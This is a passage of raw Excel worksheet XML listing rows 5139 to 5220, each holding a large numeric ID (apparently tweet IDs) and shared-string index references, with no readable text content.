      <c r="C5139" t="s">
        <v>1</v>
      </c>
      <c r="D5139" t="s">
        <v>12689</v>
      </c>
      <c r="E5139" t="s">
        <v>12690</v>
      </c>
    </row>
    <row r="5140" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5140">
        <v>1.23425325215951E+18</v>
      </c>
      <c r="B5140" t="s">
        <v>12691</v>
      </c>
      <c r="C5140" t="s">
        <v>1</v>
      </c>
      <c r="D5140" t="s">
        <v>12692</v>
      </c>
      <c r="E5140" t="s">
        <v>12693</v>
      </c>
    </row>
    <row r="5141" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5141">
        <v>1.23425220884736E+18</v>
      </c>
      <c r="B5141" t="s">
        <v>12694</v>
      </c>
      <c r="C5141" t="s">
        <v>1</v>
      </c>
      <c r="D5141" t="s">
        <v>12695</v>
      </c>
      <c r="E5141" t="s">
        <v>12103</v>
      </c>
    </row>
    <row r="5142" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5142">
        <v>1.2342520969181599E+18</v>
      </c>
      <c r="B5142" t="s">
        <v>12696</v>
      </c>
      <c r="C5142" t="s">
        <v>1</v>
      </c>
      <c r="D5142" t="s">
        <v>12697</v>
      </c>
      <c r="E5142" t="s">
        <v>12698</v>
      </c>
    </row>
    <row r="5143" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5143">
        <v>1.2342520756069199E+18</v>
      </c>
      <c r="B5143" t="s">
        <v>12699</v>
      </c>
      <c r="C5143" t="s">
        <v>1</v>
      </c>
      <c r="D5143" t="s">
        <v>12700</v>
      </c>
      <c r="E5143" t="s">
        <v>1236</v>
      </c>
    </row>
    <row r="5144" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5144">
        <v>1.23425157875392E+18</v>
      </c>
      <c r="B5144" t="s">
        <v>12701</v>
      </c>
      <c r="C5144" t="s">
        <v>1</v>
      </c>
      <c r="D5144" t="s">
        <v>12702</v>
      </c>
      <c r="E5144" t="s">
        <v>12703</v>
      </c>
    </row>
    <row r="5145" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5145">
        <v>1.2342506027058299E+18</v>
      </c>
      <c r="B5145" t="s">
        <v>12704</v>
      </c>
      <c r="C5145" t="s">
        <v>1</v>
      </c>
      <c r="D5145" t="s">
        <v>12705</v>
      </c>
      <c r="E5145" t="s">
        <v>1659</v>
      </c>
    </row>
    <row r="5146" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5146">
        <v>1.2342500949557499E+18</v>
      </c>
      <c r="B5146" t="s">
        <v>12706</v>
      </c>
      <c r="C5146" t="s">
        <v>1</v>
      </c>
      <c r="D5146" t="s">
        <v>12707</v>
      </c>
      <c r="E5146" t="s">
        <v>12708</v>
      </c>
    </row>
    <row r="5147" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5147">
        <v>1.2342496497598899E+18</v>
      </c>
      <c r="B5147" t="s">
        <v>12709</v>
      </c>
      <c r="C5147" t="s">
        <v>1</v>
      </c>
      <c r="D5147" t="s">
        <v>12710</v>
      </c>
      <c r="E5147" t="s">
        <v>254</v>
      </c>
    </row>
    <row r="5148" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5148">
        <v>1.2342475334734799E+18</v>
      </c>
      <c r="B5148" t="s">
        <v>12711</v>
      </c>
      <c r="C5148" t="s">
        <v>1</v>
      </c>
      <c r="D5148" t="s">
        <v>12712</v>
      </c>
      <c r="E5148" t="s">
        <v>12713</v>
      </c>
    </row>
    <row r="5149" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5149">
        <v>1.2342466603536499E+18</v>
      </c>
      <c r="B5149" t="s">
        <v>12714</v>
      </c>
      <c r="C5149" t="s">
        <v>1</v>
      </c>
      <c r="D5149" t="s">
        <v>12715</v>
      </c>
      <c r="E5149" t="s">
        <v>9735</v>
      </c>
    </row>
    <row r="5150" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5150">
        <v>1.23424588914675E+18</v>
      </c>
      <c r="B5150" t="s">
        <v>12716</v>
      </c>
      <c r="C5150" t="s">
        <v>1</v>
      </c>
      <c r="D5150" t="s">
        <v>12717</v>
      </c>
      <c r="E5150" t="s">
        <v>12718</v>
      </c>
    </row>
    <row r="5151" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5151">
        <v>1.2342455236469199E+18</v>
      </c>
      <c r="B5151" t="s">
        <v>12719</v>
      </c>
      <c r="C5151" t="s">
        <v>1</v>
      </c>
      <c r="D5151" t="s">
        <v>12720</v>
      </c>
      <c r="E5151" t="s">
        <v>12721</v>
      </c>
    </row>
    <row r="5152" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5152">
        <v>1.2342451653275599E+18</v>
      </c>
      <c r="B5152" t="s">
        <v>12722</v>
      </c>
      <c r="C5152" t="s">
        <v>1</v>
      </c>
      <c r="D5152" t="s">
        <v>12723</v>
      </c>
      <c r="E5152" t="s">
        <v>10033</v>
      </c>
    </row>
    <row r="5153" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5153">
        <v>1.2342443481301399E+18</v>
      </c>
      <c r="B5153" t="s">
        <v>12724</v>
      </c>
      <c r="C5153" t="s">
        <v>1</v>
      </c>
      <c r="D5153" t="s">
        <v>12725</v>
      </c>
      <c r="E5153" t="s">
        <v>12726</v>
      </c>
    </row>
    <row r="5154" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5154">
        <v>1.2342435773135099E+18</v>
      </c>
      <c r="B5154" t="s">
        <v>12727</v>
      </c>
      <c r="C5154" t="s">
        <v>1</v>
      </c>
      <c r="D5154" t="s">
        <v>12728</v>
      </c>
      <c r="E5154" t="s">
        <v>12729</v>
      </c>
    </row>
    <row r="5155" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5155">
        <v>1.23424326524897E+18</v>
      </c>
      <c r="B5155" t="s">
        <v>12730</v>
      </c>
      <c r="C5155" t="s">
        <v>1</v>
      </c>
      <c r="D5155" t="s">
        <v>12731</v>
      </c>
      <c r="E5155" t="s">
        <v>3877</v>
      </c>
    </row>
    <row r="5156" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5156">
        <v>1.23424298350928E+18</v>
      </c>
      <c r="B5156" t="s">
        <v>12732</v>
      </c>
      <c r="C5156" t="s">
        <v>1</v>
      </c>
      <c r="D5156" t="s">
        <v>12733</v>
      </c>
      <c r="E5156" t="s">
        <v>12734</v>
      </c>
    </row>
    <row r="5157" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5157">
        <v>1.2342415461464499E+18</v>
      </c>
      <c r="B5157" t="s">
        <v>12735</v>
      </c>
      <c r="C5157" t="s">
        <v>1</v>
      </c>
      <c r="D5157" t="s">
        <v>12736</v>
      </c>
      <c r="E5157" t="s">
        <v>12737</v>
      </c>
    </row>
    <row r="5158" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5158">
        <v>1.2342412335031099E+18</v>
      </c>
      <c r="B5158" t="s">
        <v>12738</v>
      </c>
      <c r="C5158" t="s">
        <v>1</v>
      </c>
      <c r="D5158" t="s">
        <v>12739</v>
      </c>
      <c r="E5158" t="s">
        <v>12740</v>
      </c>
    </row>
    <row r="5159" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5159">
        <v>1.23424044562819E+18</v>
      </c>
      <c r="B5159" t="s">
        <v>12741</v>
      </c>
      <c r="C5159" t="s">
        <v>1</v>
      </c>
      <c r="D5159" t="s">
        <v>12742</v>
      </c>
      <c r="E5159" t="s">
        <v>12669</v>
      </c>
    </row>
    <row r="5160" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5160">
        <v>1.2342395500185001E+18</v>
      </c>
      <c r="B5160" t="s">
        <v>12743</v>
      </c>
      <c r="C5160" t="s">
        <v>1</v>
      </c>
      <c r="D5160" t="s">
        <v>12744</v>
      </c>
      <c r="E5160" t="s">
        <v>1497</v>
      </c>
    </row>
    <row r="5161" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5161">
        <v>1.23423720225265E+18</v>
      </c>
      <c r="B5161" t="s">
        <v>12745</v>
      </c>
      <c r="C5161" t="s">
        <v>1</v>
      </c>
      <c r="D5161" t="s">
        <v>12746</v>
      </c>
      <c r="E5161" t="s">
        <v>5380</v>
      </c>
    </row>
    <row r="5162" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5162">
        <v>1.2342369837E+18</v>
      </c>
      <c r="B5162" t="s">
        <v>12747</v>
      </c>
      <c r="C5162" t="s">
        <v>1</v>
      </c>
      <c r="D5162" t="s">
        <v>12748</v>
      </c>
      <c r="E5162" t="s">
        <v>9180</v>
      </c>
    </row>
    <row r="5163" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5163">
        <v>1.23423624296495E+18</v>
      </c>
      <c r="B5163" t="s">
        <v>12749</v>
      </c>
      <c r="C5163" t="s">
        <v>1</v>
      </c>
      <c r="D5163" t="s">
        <v>12750</v>
      </c>
      <c r="E5163" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="5164" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5164">
        <v>1.2342346730325901E+18</v>
      </c>
      <c r="B5164" t="s">
        <v>12751</v>
      </c>
      <c r="C5164" t="s">
        <v>1</v>
      </c>
      <c r="D5164" t="s">
        <v>12752</v>
      </c>
      <c r="E5164" t="s">
        <v>12753</v>
      </c>
    </row>
    <row r="5165" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5165">
        <v>1.2342340095862001E+18</v>
      </c>
      <c r="B5165" t="s">
        <v>12754</v>
      </c>
      <c r="C5165" t="s">
        <v>1</v>
      </c>
      <c r="D5165" t="s">
        <v>12755</v>
      </c>
      <c r="E5165" t="s">
        <v>12756</v>
      </c>
    </row>
    <row r="5166" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5166">
        <v>1.2342339621108201E+18</v>
      </c>
      <c r="B5166" t="s">
        <v>12757</v>
      </c>
      <c r="C5166" t="s">
        <v>1</v>
      </c>
      <c r="D5166" t="s">
        <v>12758</v>
      </c>
      <c r="E5166" t="s">
        <v>1125</v>
      </c>
    </row>
    <row r="5167" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5167">
        <v>1.23423355935697E+18</v>
      </c>
      <c r="B5167" t="s">
        <v>12759</v>
      </c>
      <c r="C5167" t="s">
        <v>1</v>
      </c>
      <c r="D5167" t="s">
        <v>12760</v>
      </c>
      <c r="E5167" t="s">
        <v>12761</v>
      </c>
    </row>
    <row r="5168" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5168">
        <v>1.23423266466579E+18</v>
      </c>
      <c r="B5168" t="s">
        <v>12762</v>
      </c>
      <c r="C5168" t="s">
        <v>1</v>
      </c>
      <c r="D5168" t="s">
        <v>12763</v>
      </c>
      <c r="E5168" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="5169" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5169">
        <v>1.23423230002558E+18</v>
      </c>
      <c r="B5169" t="s">
        <v>12764</v>
      </c>
      <c r="C5169" t="s">
        <v>1</v>
      </c>
      <c r="D5169" t="s">
        <v>12765</v>
      </c>
      <c r="E5169" t="s">
        <v>12766</v>
      </c>
    </row>
    <row r="5170" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5170">
        <v>1.2342319573468101E+18</v>
      </c>
      <c r="B5170" t="s">
        <v>12767</v>
      </c>
      <c r="C5170" t="s">
        <v>1</v>
      </c>
      <c r="D5170" t="s">
        <v>12768</v>
      </c>
      <c r="E5170" t="s">
        <v>918</v>
      </c>
    </row>
    <row r="5171" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5171">
        <v>1.2342314179341499E+18</v>
      </c>
      <c r="B5171" t="s">
        <v>12769</v>
      </c>
      <c r="C5171" t="s">
        <v>1</v>
      </c>
      <c r="D5171" t="s">
        <v>12770</v>
      </c>
      <c r="E5171" t="s">
        <v>12771</v>
      </c>
    </row>
    <row r="5172" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5172">
        <v>1.2342307858063401E+18</v>
      </c>
      <c r="B5172" t="s">
        <v>12772</v>
      </c>
      <c r="C5172" t="s">
        <v>1</v>
      </c>
      <c r="D5172" t="s">
        <v>12773</v>
      </c>
      <c r="E5172" t="s">
        <v>12774</v>
      </c>
    </row>
    <row r="5173" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5173">
        <v>1.23423071137007E+18</v>
      </c>
      <c r="B5173" t="s">
        <v>12775</v>
      </c>
      <c r="C5173" t="s">
        <v>1</v>
      </c>
      <c r="D5173" t="s">
        <v>12776</v>
      </c>
      <c r="E5173" t="s">
        <v>12777</v>
      </c>
    </row>
    <row r="5174" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5174">
        <v>1.23422995943183E+18</v>
      </c>
      <c r="B5174" t="s">
        <v>12778</v>
      </c>
      <c r="C5174" t="s">
        <v>1</v>
      </c>
      <c r="D5174" t="s">
        <v>12779</v>
      </c>
      <c r="E5174" t="s">
        <v>12780</v>
      </c>
    </row>
    <row r="5175" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5175">
        <v>1.2342294024830001E+18</v>
      </c>
      <c r="B5175" t="s">
        <v>12781</v>
      </c>
      <c r="C5175" t="s">
        <v>1</v>
      </c>
      <c r="D5175" t="s">
        <v>12782</v>
      </c>
      <c r="E5175" t="s">
        <v>12783</v>
      </c>
    </row>
    <row r="5176" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5176">
        <v>1.23422846015712E+18</v>
      </c>
      <c r="B5176" t="s">
        <v>12784</v>
      </c>
      <c r="C5176" t="s">
        <v>1</v>
      </c>
      <c r="D5176" t="s">
        <v>12785</v>
      </c>
      <c r="E5176" t="s">
        <v>1659</v>
      </c>
    </row>
    <row r="5177" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5177">
        <v>1.2342270706554801E+18</v>
      </c>
      <c r="B5177" t="s">
        <v>12786</v>
      </c>
      <c r="C5177" t="s">
        <v>1</v>
      </c>
      <c r="D5177" t="s">
        <v>12787</v>
      </c>
      <c r="E5177" t="s">
        <v>12788</v>
      </c>
    </row>
    <row r="5178" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5178">
        <v>1.2342261264043599E+18</v>
      </c>
      <c r="B5178" t="s">
        <v>12789</v>
      </c>
      <c r="C5178" t="s">
        <v>1</v>
      </c>
      <c r="D5178" t="s">
        <v>12790</v>
      </c>
      <c r="E5178" t="s">
        <v>12791</v>
      </c>
    </row>
    <row r="5179" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5179">
        <v>1.2342258895813701E+18</v>
      </c>
      <c r="B5179" t="s">
        <v>12792</v>
      </c>
      <c r="C5179" t="s">
        <v>1</v>
      </c>
      <c r="D5179" t="s">
        <v>12793</v>
      </c>
      <c r="E5179" t="s">
        <v>12794</v>
      </c>
    </row>
    <row r="5180" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5180">
        <v>1.23422553794335E+18</v>
      </c>
      <c r="B5180" t="s">
        <v>12795</v>
      </c>
      <c r="C5180" t="s">
        <v>1</v>
      </c>
      <c r="D5180" t="s">
        <v>12796</v>
      </c>
      <c r="E5180" t="s">
        <v>12797</v>
      </c>
    </row>
    <row r="5181" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5181">
        <v>1.23422546909408E+18</v>
      </c>
      <c r="B5181" t="s">
        <v>12798</v>
      </c>
      <c r="C5181" t="s">
        <v>1</v>
      </c>
      <c r="D5181" t="s">
        <v>12799</v>
      </c>
      <c r="E5181" t="s">
        <v>12800</v>
      </c>
    </row>
    <row r="5182" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5182">
        <v>1.2342250672503301E+18</v>
      </c>
      <c r="B5182" t="s">
        <v>12801</v>
      </c>
      <c r="C5182" t="s">
        <v>1</v>
      </c>
      <c r="D5182" t="s">
        <v>12802</v>
      </c>
      <c r="E5182" t="s">
        <v>12803</v>
      </c>
    </row>
    <row r="5183" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5183">
        <v>1.2342249407711301E+18</v>
      </c>
      <c r="B5183" t="s">
        <v>12804</v>
      </c>
      <c r="C5183" t="s">
        <v>1</v>
      </c>
      <c r="D5183" t="s">
        <v>12805</v>
      </c>
      <c r="E5183" t="s">
        <v>12806</v>
      </c>
    </row>
    <row r="5184" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5184">
        <v>1.2342235422098401E+18</v>
      </c>
      <c r="B5184" t="s">
        <v>12807</v>
      </c>
      <c r="C5184" t="s">
        <v>1</v>
      </c>
      <c r="D5184" t="s">
        <v>12808</v>
      </c>
      <c r="E5184" t="s">
        <v>891</v>
      </c>
    </row>
    <row r="5185" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5185">
        <v>1.2342229254458299E+18</v>
      </c>
      <c r="B5185" t="s">
        <v>12809</v>
      </c>
      <c r="C5185" t="s">
        <v>1</v>
      </c>
      <c r="D5185" t="s">
        <v>12810</v>
      </c>
      <c r="E5185" t="s">
        <v>12811</v>
      </c>
    </row>
    <row r="5186" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5186">
        <v>1.2342225644755899E+18</v>
      </c>
      <c r="B5186" t="s">
        <v>12812</v>
      </c>
      <c r="C5186" t="s">
        <v>1</v>
      </c>
      <c r="D5186" t="s">
        <v>12813</v>
      </c>
      <c r="E5186" t="s">
        <v>12814</v>
      </c>
    </row>
    <row r="5187" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5187">
        <v>1.2342221661509299E+18</v>
      </c>
      <c r="B5187" t="s">
        <v>12815</v>
      </c>
      <c r="C5187" t="s">
        <v>1</v>
      </c>
      <c r="D5187" t="s">
        <v>12816</v>
      </c>
      <c r="E5187" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5188" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5188">
        <v>1.2342219434627799E+18</v>
      </c>
      <c r="B5188" t="s">
        <v>12817</v>
      </c>
      <c r="C5188" t="s">
        <v>1</v>
      </c>
      <c r="D5188" t="s">
        <v>12818</v>
      </c>
      <c r="E5188" t="s">
        <v>12819</v>
      </c>
    </row>
    <row r="5189" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5189">
        <v>1.2342212592417201E+18</v>
      </c>
      <c r="B5189" t="s">
        <v>12820</v>
      </c>
      <c r="C5189" t="s">
        <v>1</v>
      </c>
      <c r="D5189" t="s">
        <v>12821</v>
      </c>
      <c r="E5189" t="s">
        <v>12822</v>
      </c>
    </row>
    <row r="5190" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5190">
        <v>1.2342205332329101E+18</v>
      </c>
      <c r="B5190" t="s">
        <v>12823</v>
      </c>
      <c r="C5190" t="s">
        <v>1</v>
      </c>
      <c r="D5190" t="s">
        <v>12824</v>
      </c>
      <c r="E5190" t="s">
        <v>1665</v>
      </c>
    </row>
    <row r="5191" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5191">
        <v>1.2342204496404301E+18</v>
      </c>
      <c r="B5191" t="s">
        <v>12825</v>
      </c>
      <c r="C5191" t="s">
        <v>1</v>
      </c>
      <c r="D5191" t="s">
        <v>12826</v>
      </c>
      <c r="E5191" t="s">
        <v>12827</v>
      </c>
    </row>
    <row r="5192" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5192">
        <v>1.23421759800447E+18</v>
      </c>
      <c r="B5192" t="s">
        <v>12828</v>
      </c>
      <c r="C5192" t="s">
        <v>1</v>
      </c>
      <c r="D5192" t="s">
        <v>12829</v>
      </c>
      <c r="E5192" t="s">
        <v>7705</v>
      </c>
    </row>
    <row r="5193" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5193">
        <v>1.2342164175930399E+18</v>
      </c>
      <c r="B5193" t="s">
        <v>12830</v>
      </c>
      <c r="C5193" t="s">
        <v>1</v>
      </c>
      <c r="D5193" t="s">
        <v>12831</v>
      </c>
      <c r="E5193" t="s">
        <v>12832</v>
      </c>
    </row>
    <row r="5194" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5194">
        <v>1.23421631375042E+18</v>
      </c>
      <c r="B5194" t="s">
        <v>12833</v>
      </c>
      <c r="C5194" t="s">
        <v>1</v>
      </c>
      <c r="D5194" t="s">
        <v>12834</v>
      </c>
      <c r="E5194" t="s">
        <v>12835</v>
      </c>
    </row>
    <row r="5195" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5195">
        <v>1.23421568509567E+18</v>
      </c>
      <c r="B5195" t="s">
        <v>12836</v>
      </c>
      <c r="C5195" t="s">
        <v>1</v>
      </c>
      <c r="D5195" t="s">
        <v>12837</v>
      </c>
      <c r="E5195" t="s">
        <v>12838</v>
      </c>
    </row>
    <row r="5196" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5196">
        <v>1.2342156380899899E+18</v>
      </c>
      <c r="B5196" t="s">
        <v>12839</v>
      </c>
      <c r="C5196" t="s">
        <v>1</v>
      </c>
      <c r="D5196" t="s">
        <v>12840</v>
      </c>
      <c r="E5196" t="s">
        <v>12841</v>
      </c>
    </row>
    <row r="5197" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5197">
        <v>1.2342146136858701E+18</v>
      </c>
      <c r="B5197" t="s">
        <v>12842</v>
      </c>
      <c r="C5197" t="s">
        <v>1</v>
      </c>
      <c r="D5197" t="s">
        <v>12843</v>
      </c>
      <c r="E5197" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5198" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5198">
        <v>1.23421421827199E+18</v>
      </c>
      <c r="B5198" t="s">
        <v>12844</v>
      </c>
      <c r="C5198" t="s">
        <v>1</v>
      </c>
      <c r="D5198" t="s">
        <v>12845</v>
      </c>
      <c r="E5198" t="s">
        <v>12846</v>
      </c>
    </row>
    <row r="5199" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5199">
        <v>1.2342138005570099E+18</v>
      </c>
      <c r="B5199" t="s">
        <v>12847</v>
      </c>
      <c r="C5199" t="s">
        <v>1</v>
      </c>
      <c r="D5199" t="s">
        <v>12848</v>
      </c>
      <c r="E5199" t="s">
        <v>12849</v>
      </c>
    </row>
    <row r="5200" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5200">
        <v>1.2342120201504599E+18</v>
      </c>
      <c r="B5200" t="s">
        <v>12850</v>
      </c>
      <c r="C5200" t="s">
        <v>1</v>
      </c>
      <c r="D5200" t="s">
        <v>12851</v>
      </c>
      <c r="E5200" t="s">
        <v>12852</v>
      </c>
    </row>
    <row r="5201" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5201">
        <v>1.2342115407959301E+18</v>
      </c>
      <c r="B5201" t="s">
        <v>12853</v>
      </c>
      <c r="C5201" t="s">
        <v>1</v>
      </c>
      <c r="D5201" t="s">
        <v>12854</v>
      </c>
      <c r="E5201" t="s">
        <v>2516</v>
      </c>
    </row>
    <row r="5202" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5202">
        <v>1.2342110558045701E+18</v>
      </c>
      <c r="B5202" t="s">
        <v>12855</v>
      </c>
      <c r="C5202" t="s">
        <v>1</v>
      </c>
      <c r="D5202" t="s">
        <v>12856</v>
      </c>
      <c r="E5202" t="s">
        <v>3959</v>
      </c>
    </row>
    <row r="5203" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5203">
        <v>1.2342110039923E+18</v>
      </c>
      <c r="B5203" t="s">
        <v>12857</v>
      </c>
      <c r="C5203" t="s">
        <v>1</v>
      </c>
      <c r="D5203" t="s">
        <v>12858</v>
      </c>
      <c r="E5203" t="s">
        <v>12859</v>
      </c>
    </row>
    <row r="5204" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5204">
        <v>1.2342107573714701E+18</v>
      </c>
      <c r="B5204" t="s">
        <v>12860</v>
      </c>
      <c r="C5204" t="s">
        <v>1</v>
      </c>
      <c r="D5204" t="s">
        <v>12861</v>
      </c>
      <c r="E5204" t="s">
        <v>1816</v>
      </c>
    </row>
    <row r="5205" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5205">
        <v>1.2342105564264901E+18</v>
      </c>
      <c r="B5205" t="s">
        <v>12862</v>
      </c>
      <c r="C5205" t="s">
        <v>1</v>
      </c>
      <c r="D5205" t="s">
        <v>12863</v>
      </c>
      <c r="E5205" t="s">
        <v>7141</v>
      </c>
    </row>
    <row r="5206" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5206">
        <v>1.23421032347056E+18</v>
      </c>
      <c r="B5206" t="s">
        <v>12864</v>
      </c>
      <c r="C5206" t="s">
        <v>1</v>
      </c>
      <c r="D5206" t="s">
        <v>12865</v>
      </c>
      <c r="E5206" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="5207" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5207">
        <v>1.23420941788691E+18</v>
      </c>
      <c r="B5207" t="s">
        <v>12866</v>
      </c>
      <c r="C5207" t="s">
        <v>1</v>
      </c>
      <c r="D5207" t="s">
        <v>12867</v>
      </c>
      <c r="E5207" t="s">
        <v>12868</v>
      </c>
    </row>
    <row r="5208" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5208">
        <v>1.2342080632777101E+18</v>
      </c>
      <c r="B5208" t="s">
        <v>12869</v>
      </c>
      <c r="C5208" t="s">
        <v>1</v>
      </c>
      <c r="D5208" t="s">
        <v>12870</v>
      </c>
      <c r="E5208" t="s">
        <v>12871</v>
      </c>
    </row>
    <row r="5209" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5209">
        <v>1.2342077463644401E+18</v>
      </c>
      <c r="B5209" t="s">
        <v>12872</v>
      </c>
      <c r="C5209" t="s">
        <v>1</v>
      </c>
      <c r="D5209" t="s">
        <v>12873</v>
      </c>
      <c r="E5209" t="s">
        <v>12874</v>
      </c>
    </row>
    <row r="5210" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5210">
        <v>1.2342077249315999E+18</v>
      </c>
      <c r="B5210" t="s">
        <v>12875</v>
      </c>
      <c r="C5210" t="s">
        <v>1</v>
      </c>
      <c r="D5210" t="s">
        <v>12876</v>
      </c>
      <c r="E5210" t="s">
        <v>12877</v>
      </c>
    </row>
    <row r="5211" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5211">
        <v>1.23420716811677E+18</v>
      </c>
      <c r="B5211" t="s">
        <v>12878</v>
      </c>
      <c r="C5211" t="s">
        <v>1</v>
      </c>
      <c r="D5211" t="s">
        <v>12879</v>
      </c>
      <c r="E5211" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5212" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5212">
        <v>1.2342068173554601E+18</v>
      </c>
      <c r="B5212" t="s">
        <v>12880</v>
      </c>
      <c r="C5212" t="s">
        <v>1</v>
      </c>
      <c r="D5212" t="s">
        <v>12881</v>
      </c>
      <c r="E5212" t="s">
        <v>1645</v>
      </c>
    </row>
    <row r="5213" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5213">
        <v>1.2342067967488699E+18</v>
      </c>
      <c r="B5213" t="s">
        <v>12882</v>
      </c>
      <c r="C5213" t="s">
        <v>1</v>
      </c>
      <c r="D5213" t="s">
        <v>12883</v>
      </c>
      <c r="E5213" t="s">
        <v>12698</v>
      </c>
    </row>
    <row r="5214" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5214">
        <v>1.2342067786923699E+18</v>
      </c>
      <c r="B5214" t="s">
        <v>12884</v>
      </c>
      <c r="C5214" t="s">
        <v>1</v>
      </c>
      <c r="D5214" t="s">
        <v>12885</v>
      </c>
      <c r="E5214" t="s">
        <v>12886</v>
      </c>
    </row>
    <row r="5215" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5215">
        <v>1.2342051837580001E+18</v>
      </c>
      <c r="B5215" t="s">
        <v>12887</v>
      </c>
      <c r="C5215" t="s">
        <v>1</v>
      </c>
      <c r="D5215" t="s">
        <v>12888</v>
      </c>
      <c r="E5215" t="s">
        <v>2265</v>
      </c>
    </row>
    <row r="5216" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5216">
        <v>1.23420459598496E+18</v>
      </c>
      <c r="B5216" t="s">
        <v>12889</v>
      </c>
      <c r="C5216" t="s">
        <v>1</v>
      </c>
      <c r="D5216" t="s">
        <v>12890</v>
      </c>
      <c r="E5216" t="s">
        <v>12891</v>
      </c>
    </row>
    <row r="5217" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5217">
        <v>1.23420427938638E+18</v>
      </c>
      <c r="B5217" t="s">
        <v>12892</v>
      </c>
      <c r="C5217" t="s">
        <v>1</v>
      </c>
      <c r="D5217" t="s">
        <v>12893</v>
      </c>
      <c r="E5217" t="s">
        <v>486</v>
      </c>
    </row>
    <row r="5218" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5218">
        <v>1.2342042452446799E+18</v>
      </c>
      <c r="B5218" t="s">
        <v>12894</v>
      </c>
      <c r="C5218" t="s">
        <v>1</v>
      </c>
      <c r="D5218" t="s">
        <v>12895</v>
      </c>
      <c r="E5218" t="s">
        <v>1105</v>
      </c>
    </row>
    <row r="5219" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5219">
        <v>1.2342035352412001E+18</v>
      </c>
      <c r="B5219" t="s">
        <v>12896</v>
      </c>
      <c r="C5219" t="s">
        <v>1</v>
      </c>
      <c r="D5219" t="s">
        <v>12897</v>
      </c>
      <c r="E5219" t="s">
        <v>12898</v>
      </c>
    </row>
    <row r="5220" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5220">
        <v>1.2342031150768901E+18</v>
      </c>
      <c r="B5220" t="s">
        <v>12899</v>
      </c>
      <c r="C5220" t="s">
        <v>1</v>
      </c>
      <c r="D5220" t="s">
